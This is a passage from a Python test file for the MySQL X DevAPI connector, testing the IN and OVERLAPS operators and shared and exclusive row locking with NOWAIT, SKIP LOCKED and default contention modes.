table.select().where("(1>5) IN (true, false)").limit(1).execute() ) result1 = ( table.select() .where("('a'>'b') in (true, false)") .limit(1) .execute() ) result2 = ( table.select() .where( "true IN [(1>5), !(false), (true || false), (false && true)]" ) .limit(1) .execute() ) self.assertEqual(len(result.fetch_all()), 1) self.assertEqual(len(result1.fetch_all()), 1) self.assertEqual(len(result2.fetch_all()), 1) self.session.sql("drop table if exists t12").execute() @tests.foreach_session() def test_contains_operator_select13(self): """Test IN operator with operands having expressions.""" self.session.sql("drop table if exists t13").execute() self.session.sql("create table t13(i json, n json, a json)").execute() table = self.schema.get_table("t13") table.insert().values('{"id":1}', '{"name":"a"}', '{"age":21}').values( '{"id":2}', '{"name":"b"}', '{"age":22}' ).execute() self.assertRaises( mysqlx.OperationalError, table.select().where("(1+5) IN [1,2,3,4,5,6]").execute, ) table.select().where("(2+3) IN (1,2,3,4)").limit(1).execute() self.session.sql("drop table if exists t13").execute() @tests.foreach_session() def test_contains_operator_select14(self): """Test IN operator: search for empty string in a field and field in empty string.""" self.session.sql("drop table if exists t14").execute() self.session.sql("create table t14(id int, n JSON, age int)").execute() table = self.schema.get_table("t14") table.insert().values(1, '{"name":"a"}', 21).values( 2, '{"name":"b"}', 22 ).values(3, '{"name":"c"}', 32).execute() result = table.select().where("'' IN n->'$.name'").execute() result1 = table.select().where("n->'$.name' IN ['', ' ']").execute() result2 = table.select().where("n->'$.name' IN ('', ' ')").execute() self.assertEqual(len(result.fetch_all()), 0) self.assertEqual(len(result1.fetch_all()), 0) self.assertEqual(len(result2.fetch_all()), 0) self.session.sql("drop table if exists t14").execute() @tests.foreach_session() def test_table_s_s_lock(self): """Test shared-shared lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t1").execute() self.session.sql( "create table t1(name varchar(20), age int)" ).execute() table = self.schema.get_table("t1") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t1") session1.start_transaction() table.select().where("name = 'James'").lock_shared().execute() locking.set() time.sleep(2) locking.clear() if waiting.is_set(): session1.commit() self.fail( "Table_S_S_Lock_test IS NOT OK. Other thread is waiting " "while it is not expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t1") if not locking.wait(2): self.fail( "Table_S_S_Lock_test IS NOT OK. Other thread has not set " "the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_shared().execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_table_s_x_lock(self): """Test shared-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t2").execute() self.session.sql( "create table t2(name varchar(20), age int)" ).execute() table = self.schema.get_table("t2") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t2") session1.start_transaction() table.select().where("name = 'James'").lock_shared().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_S_X_Lock_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t2") if not locking.wait(2): self.fail( "Table_S_X_Lock_test IS NOT OK. Other thread has not set " "the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_exclusive().execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_table_x_x_lock(self): """Test clusive-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t3").execute() self.session.sql( "create table t3(name varchar(20), age int)" ).execute() table = self.schema.get_table("t3") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t3") session1.start_transaction() table.select().where("name = 'James'").lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_X_X_Lock_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t3") if not locking.wait(2): self.fail( "Table_X_X_Lock_test IS NOT OK. Other thread has not set " "the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_exclusive().execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t3").execute() @tests.foreach_session() def test_table_x_s_lock(self): """Test exclusive-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t4").execute() self.session.sql( "create table t4(name varchar(20), age int)" ).execute() table = self.schema.get_table("t4") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t4") session1.start_transaction() table.select().where("name = 'James'").lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_X_S_Lock_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t4") if not locking.wait(2): self.fail( "Table_X_S_Lock_test IS NOT OK. Other thread has not set " "the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_shared().execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t4").execute() @tests.foreach_session() def test_table_multiple_lock_calls(self): """Test multiple lock calls.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t5").execute() self.session.sql( "create table t5(name varchar(20), age int)" ).execute() table = self.schema.get_table("t5") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t5") session1.start_transaction() table.select().where( "name = 'James'" ).lock_exclusive().lock_shared().lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_Multiple_Lock_calls_test IS NOT OK. Other thread " "is not waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t5") if not locking.wait(2): self.fail( "Table_Multiple_Lock_calls_test IS NOT OK. Other thread " "has not set the lock!" ) session2.start_transaction() waiting.set() table.select().where( "name = 'James'" ).lock_shared().lock_exclusive().lock_exclusive().lock_shared().execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t5").execute() @tests.foreach_session() def test_table_x_lock_update(self): """Test lock exclusive and update().where - update().where will be blocked until the lock is released.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t6").execute() self.session.sql( "create table t6(name varchar(20), age int)" ).execute() table = self.schema.get_table("t6") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t6") session1.start_transaction() table.select().where( "name = 'James'" ).lock_exclusive().lock_shared().lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_X_Lock_Update_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t6") if not locking.wait(2): self.fail( "Table_X_Lock_Update_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() waiting.set() table.update().where("name == 'James'").set("age", 30).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t6").execute() @tests.foreach_session() def test_table_s_lock_update(self): """Test lock shared and update().where - update().where will be blocked until the lock is released, but will be able to read.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t7").execute() self.session.sql( "create table t7(name varchar(20), age int)" ).execute() table = self.schema.get_table("t7") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t7") session1.start_transaction() table.select().where( "name = 'James'" ).lock_exclusive().lock_shared().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_S_Lock_Update_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t7") if not locking.wait(2): self.fail( "Table_S_Lock_Update_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() result = table.select().where("name == 'James'").execute() self.assertEqual(result.fetch_all()[0]["age"], 23) waiting.set() table.update().where("name == 'James'").set("age", 30).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t7").execute() @tests.foreach_session() def test_table_s_s_nowait(self): """Test shared-shared with NOWAIT lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_shared(NOWAIT) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_shared().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() result = ( table2.select() .where("name = 'James'") .lock_shared(mysqlx.LockContention.NOWAIT) .execute() ) res = result.fetch_all() self.assertEqual(len(res), 1) self.assertEqual(res[0]["age"], 23) session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_s_x_nowait(self): """Test shared-exclusive with NOWAIT lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(NOWAIT) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_shared().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() try: table2.select().where("name = 'James'").lock_exclusive( mysqlx.LockContention.NOWAIT ).execute() except mysqlx.OperationalError: # Expected OperationalError pass session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_x_x_nowait(self): """Test exclusive-exclusive with NOWAIT lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(NOWAIT) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_exclusive().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() try: table2.select().where("name = 'James'").lock_exclusive( mysqlx.LockContention.NOWAIT ).execute() except mysqlx.OperationalError: # Expected OperationalError pass session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_x_s_nowait(self): """Test exclusive-shared with NOWAIT lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(NOWAIT) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_exclusive().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() try: table2.select().where("name = 'James'").lock_shared( mysqlx.LockContention.NOWAIT ).execute() except mysqlx.OperationalError: # Expected OperationalError pass session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_s_s_skip_locked(self): """Test shared-shared with SKIP LOCKED lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(SKIP_LOCKED) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_shared().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() result = ( table2.select() .where("name = 'James'") .lock_shared(mysqlx.LockContention.SKIP_LOCKED) .execute() ) res = result.fetch_all() self.assertEqual(len(res), 1) self.assertEqual(res[0]["age"], 23) session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_s_x_skip_locked(self): """Test shared-exclusive with SKIP LOCKED lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(SKIP_LOCKED) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_shared().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() result = ( table2.select() .where("name = 'James'") .lock_exclusive(mysqlx.LockContention.SKIP_LOCKED) .execute() ) res = result.fetch_all() self.assertEqual(len(res), 0) session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_x_x_skip_locked(self): """Test exclusive-exclusive with SKIP LOCKED lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(SKIP_LOCKED) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_exclusive().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() result = ( table2.select() .where("name = 'James'") .lock_exclusive(mysqlx.LockContention.SKIP_LOCKED) .execute() ) res = result.fetch_all() self.assertEqual(len(res), 0) session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_x_s_skip_locked(self): """Test exclusive-shared with SKIP LOCKED lockcontention.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t").execute() self.session.sql("create table t(name varchar(20), age int)").execute() table = self.schema.get_table("t") table.insert().values("Joe", 21).values("James", 23).execute() # `session2.lock_exclusive(SKIP_LOCKED) returns data immediately. session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table1 = schema1.get_table("t") session1.start_transaction() table1.select().where("name = 'James'").lock_exclusive().execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table2 = schema2.get_table("t") session2.start_transaction() result = ( table2.select() .where("name = 'James'") .lock_shared(mysqlx.LockContention.SKIP_LOCKED) .execute() ) res = result.fetch_all() self.assertEqual(len(res), 0) session2.rollback() session1.rollback() self.session.sql("drop table if exists t").execute() session2.close() session1.close() @tests.foreach_session() def test_table_s_s_default(self): """Test shared-shared lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t1").execute() self.session.sql( "create table t1(name varchar(20), age int)" ).execute() table = self.schema.get_table("t1") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t1") session1.start_transaction() table.select().where("name = 'James'").lock_shared().execute() locking.set() time.sleep(2) locking.clear() if waiting.is_set(): session1.commit() self.fail( "Table_S_S_DEFAULT_test IS NOT OK. Other thread is " "waiting while it is not expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t1") if not locking.wait(2): self.fail( "Table_S_S_DEFAULT_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_shared( mysqlx.LockContention.DEFAULT ).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_table_s_x_default(self): """Test shared-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t2").execute() self.session.sql( "create table t2(name varchar(20), age int)" ).execute() table = self.schema.get_table("t2") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t2") session1.start_transaction() table.select().where("name = 'James'").lock_shared().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_S_X_DEFAULT_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t2") if not locking.wait(2): self.fail( "Table_S_X_DEFAULT_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_exclusive( mysqlx.LockContention.DEFAULT ).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_table_x_x_default(self): """Test exclusive-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t3").execute() self.session.sql( "create table t3(name varchar(20), age int)" ).execute() table = self.schema.get_table("t3") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t3") session1.start_transaction() table.select().where("name = 'James'").lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_X_X_DEFAULT_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t3") if not locking.wait(2): self.fail( "Table_X_X_DEFAULT_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_exclusive( mysqlx.LockContention.DEFAULT ).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t3").execute() @tests.foreach_session() def test_table_x_s_default(self): """Test exclusive-exclusive lock.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t4").execute() self.session.sql( "create table t4(name varchar(20), age int)" ).execute() table = self.schema.get_table("t4") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t4") session1.start_transaction() table.select().where("name = 'James'").lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if not waiting.is_set(): session1.commit() self.fail( "Table_X_S_DEFAULT_test IS NOT OK. Other thread is not " "waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t4") if not locking.wait(2): self.fail( "Table_X_S_DEFAULT_test IS NOT OK. Other thread has not " "set the lock!" ) session2.start_transaction() waiting.set() table.select().where("name = 'James'").lock_shared( mysqlx.LockContention.DEFAULT ).execute() waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t4").execute() @tests.foreach_session() def test_table_multiple_lock_contention_calls(self): """Test multiple lock calls.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t5").execute() self.session.sql( "create table t5(name varchar(20), age int)" ).execute() table = self.schema.get_table("t5") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t5") session1.start_transaction() table.select().where( "name = 'James'" ).lock_exclusive().lock_shared().lock_exclusive().execute() locking.set() time.sleep(2) locking.clear() if waiting.is_set(): session1.commit() self.fail( "Table_Multiple_Lock_calls_test IS NOT OK. Other thread " "is waiting while it is not expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t5") if not locking.wait(2): self.fail( "Table_Multiple_Lock_calls_test IS NOT OK. Other thread " "has not set the lock!" ) session2.start_transaction() waiting.set() result = ( table.select() .where("name = 'James'") .lock_shared(mysqlx.LockContention.DEFAULT) .lock_exclusive(mysqlx.LockContention.SKIP_LOCKED) .lock_exclusive(mysqlx.LockContention.NOWAIT) .lock_shared(mysqlx.LockContention.SKIP_LOCKED) .execute() ) res = result.fetch_all() assert len(res) == 0 waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t5").execute() @tests.foreach_session() def test_table_update_x_nowait(self): """Test lock exclusive and update().where - update().where will be blocked until the lock is released.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t6").execute() self.session.sql( "create table t6(name varchar(20), age int)" ).execute() table = self.schema.get_table("t6") table.insert().values("Joe", 21).values("James", 23).execute() session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t6") session1.start_transaction() table.update().where("name == 'James'").set("age", 30).execute() session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t6") session2.start_transaction() try: table.select().where("name = 'James'").lock_exclusive( mysqlx.LockContention.DEFAULT ).lock_shared(mysqlx.LockContention.SKIP_LOCKED).lock_exclusive( mysqlx.LockContention.NOWAIT ).execute() except mysqlx.OperationalError: # Expected OperationalError pass session2.rollback() session1.rollback() self.session.sql("drop table if exists t6").execute() session2.close() session1.close() @tests.foreach_session() def test_table_update_s_skip_locked(self): """Test lock shared and update().where - update().where will be blocked until the lock is released, but will be able to read.""" config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql("drop table if exists t7").execute() self.session.sql( "create table t7(name varchar(20), age int)" ).execute() table = self.schema.get_table("t7") table.insert().values("Joe", 21).values("James", 23).execute() locking = threading.Event() waiting = threading.Event() def thread_a(locking, waiting): session1 = mysqlx.get_session(config) schema1 = session1.get_schema(schema_name) table = schema1.get_table("t7") session1.start_transaction() result = table.select().where("name == 'James'").execute() assert result.fetch_all()[0]["age"] == 23 table.update().where("name == 'James'").set("age", 30).execute() locking.set() time.sleep(2) locking.clear() if waiting.is_set(): session1.commit() self.fail( "Table_Update_S_SKIP_LOCKED_test IS NOT OK. Other thread " "is not waiting while it is expected to!" ) session1.commit() def thread_b(locking, waiting): session2 = mysqlx.get_session(config) schema2 = session2.get_schema(schema_name) table = schema2.get_table("t7") if not locking.wait(2): self.fail( "Table_Update_S_SKIP_LOCKED_test IS NOT OK. Other thread " "has not set the lock!" ) session2.start_transaction() waiting.set() result = ( table.select() .where("name = 'James'") .lock_exclusive(mysqlx.LockContention.NOWAIT) .lock_shared(mysqlx.LockContention.SKIP_LOCKED) .execute() ) waiting.clear() session2.commit() client1 = threading.Thread( target=thread_a, args=( locking, waiting, ), ) client2 = threading.Thread( target=thread_b, args=( locking, waiting, ), ) client1.start() client2.start() client1.join() client2.join() self.session.sql("drop table if exists t7").execute() @tests.foreach_session() def test_overlaps_table_select1(self): """OVERLAPS operator with string on both sides - With LHS in RHS.""" self.session.sql("drop table if exists t1").execute() self.session.sql("create table t1(a int , b int, c JSON)").execute() table = self.schema.get_table("t1") table.insert().values(1, 1, '{"comp":"abc"}').values( 2, 1, '{"comp":"pqr"}' ).values(3, 2, '{"comp":"xyz"}').execute() result = ( table.select("a").where("'pqr' OVERLAPS c->'$.comp'").execute() ) row = result.fetch_all() self.assertEqual(len(row), 1) self.assertEqual(row[0]["a"], 2) self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_overlaps_table_select2(self): """OVERLAPS operator with int as operand - With LHS in RHS.""" self.session.sql("drop table if exists t2").execute() self.session.sql( "create table t2(name varchar(20) , a JSON, c varchar(20))" ).execute() table = self.schema.get_table("t2") table.insert().values("a", '{"age":21}', "abc").values( "b", '{"age":31}', "pqr" ).values("hell", '{"age":22}', "xyz").execute() result = table.select().where("a->$.age OVERLAPS [21,31]").execute() self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_overlaps_table_select3(self): """OVERLAPS operator with boolean as operand - With LHS in RHS.""" self.session.sql("create table t3(n JSON, a json, c JSON)").execute() table = self.schema.get_table("t3") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = table.select().where("21 OVERLAPS a->'$.age'").execute() self.assertEqual(len(result.fetch_all()), 1) self.session.sql("drop table if exists t3").execute() @tests.foreach_session() def test_overlaps_table_select4(self): """NOT OVERLAPS operator with string operand - With LHS not in RHS.""" self.session.sql("create table t4(n JSON, age int, c JSON)").execute() table = self.schema.get_table("t4") table.insert().values('{"name":"joy"}', 18, '{"comp":"abc"}').values( '{"name":"happy"}', 21, '{"comp":"pqr"}' ).values('{"name":"sad"}', 32, '{"comp":"xyz"}').execute() result = ( table.select().where("'happy' NOT OVERLAPS n->'$.name'").execute() ) self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t4").execute() @tests.foreach_session() def test_overlaps_table_select5(self): """NOT OVERLAPS operator with int as operand - With LHS not in RHS.""" self.session.sql("create table t5(n JSON, a JSON, c JSON)").execute() table = self.schema.get_table("t5") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = ( table.select().where("[21,32] NOT OVERLAPS a->'$.age'").execute() ) self.assertEqual(len(result.fetch_all()), 1) self.session.sql("drop table if exists t5").execute() @tests.foreach_session() def test_overlaps_table_select6(self): """NOT OVERLAPS operator with boolean as operand - With LHS not in RHS.""" self.session.sql( "create table t6(name varchar(20) , age int, c json)" ).execute() table = self.schema.get_table("t6") table.insert().values("a", 21, '{"comp":"pqr"}').values( "b", 31, '{"comp":"xyz"}' ).values("e", 22, '{"comp":"xyz"}').execute() 